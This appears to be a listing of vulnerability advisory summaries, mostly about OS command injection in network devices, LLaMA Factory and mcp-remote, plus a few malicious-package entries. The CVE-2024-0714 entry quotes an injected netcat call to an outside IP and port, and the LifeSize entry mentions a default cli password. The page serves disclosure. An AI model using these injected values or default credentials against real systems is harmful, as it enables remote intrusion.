CVE-2019-7632

LifeSize Team, Room, Passport, and Networker 220 devices allow Authenticated Remote OS Command Injection, as demonstrated by shell metacharacters in the support/mtusize.php mtusize parameter. The lifesize default password for the cli account may sometimes be used for authentication...

EUVD-2019-17165

Malware in sbrugna...

EUVD-2024-47324

Malicious code in bioql PyPI...

mcp-remote exposed to OS command injection via untrusted MCP server connections

mcp-remote is exposed to OS command injection when connecting to untrusted MCP servers due to crafted input from the authorizationendpoint response URL...

CVE-2025-5444

A vulnerability has been found in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001 and classified as critical. Affected by this vulnerability is the function RPUpgradeFWByBBS of the file /goform/RPUpgradeFWByBBS. The manipulation of...

CVE-2024-3721

A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys=SOSTREAMAX. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely. Th...

CVE-2025-1608

A vulnerability, which was classified as critical, was found in LB-LINK AC1900 Router 1.0.2. Affected is the function websGetVar of the file /goform/setmanpwd. The manipulation of the argument routepwd leads to os command injection. It is possible to launch the attack remotely. The exploit has...

CVE-2025-1536

A vulnerability was found in Raisecom Multi-Service Intelligent Gateway up to 20250208. It has been declared as critical. This vulnerability affects unknown code of the file /vpn/vpntemplatestyle.php of the component Request Parameter Handler. The manipulation of the argument stylenum leads to os...

CVE-2024-4582

A vulnerability classified as critical has been found in Faraday GM8181 and GM828x up to 20240429. Affected is an unknown function of the component NTP Service. The manipulation of the argument ntpsrv leads to os command injection. It is possible to launch the attack remotely. The exploit has bee...

CVE-2024-0918

A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploi...

GHSA-HJ3W-WRH4-44VP LLama Factory Remote OS Command Injection Vulnerability

Summary A critical remote OS command injection vulnerability has been identified in the Llama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on the host system. The issue is caused by insecure...

CVE-2024-52803

LLama Factory enables fine-tuning of large language models. A critical remote OS command injection vulnerability has been identified in the LLama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on...

CVE-2024-52803 LLama Factory Remote OS Command Injection Vulnerability

LLama Factory enables fine-tuning of large language models. A critical remote OS command injection vulnerability has been identified in the LLama Factory training process. This vulnerability arises from improper handling of user input, allowing malicious actors to execute arbitrary OS commands on...

CVE-2024-52803

CVE-2024-52803 affects LLama Factory, where the training process is vulnerable to a remote OS command injection due to insecure use of Popen with shell=True and unsanitized user input. The issue allows an attacker to execute arbitrary OS commands on the host, with impact described as high for con...

CVE-2024-4509

CVE-2024-4509 affects Ruijie RG-UAC up to 20240428. The vulnerability is an OS command injection in the PHP endpoint /view/IPV6/naborTable/add_commit.php, triggered by manipulating the ip_addr/mac_addr arguments. It can be exploited remotely, and public disclosure of the exploit is noted. Affecte...

CVE-2024-4507

A vulnerability was found in Ruijie RG-UAC up to 20240428 and classified as critical. This issue affects some unknown processing of the file /view/IPV6/ipv6StaticRoute/staticrouteaddipv6.php. The manipulation of the argument textprefixlen/textgateway/devname leads to os command injection. The...

CVE-2024-3346

Byzoro Smart S80 (up to 20240328) contains an OS command injection vulnerability in /log/webmailattach.php via the mail_file_path parameter. This can be exploited remotely; the exploit has been disclosed publicly (VDB-259450). Affected product/version information is limited to the Byzoro Smart S8...

CVE-2024-0714

A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 ...

Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection Date: 21.09.2021 Exploit Author: LiquidWorm Vendor Homepage: https://www.cypress.bc.ca Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection Vendor: Cypress Solutions Inc. Product web page:...

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

Summary CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications. The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site office and...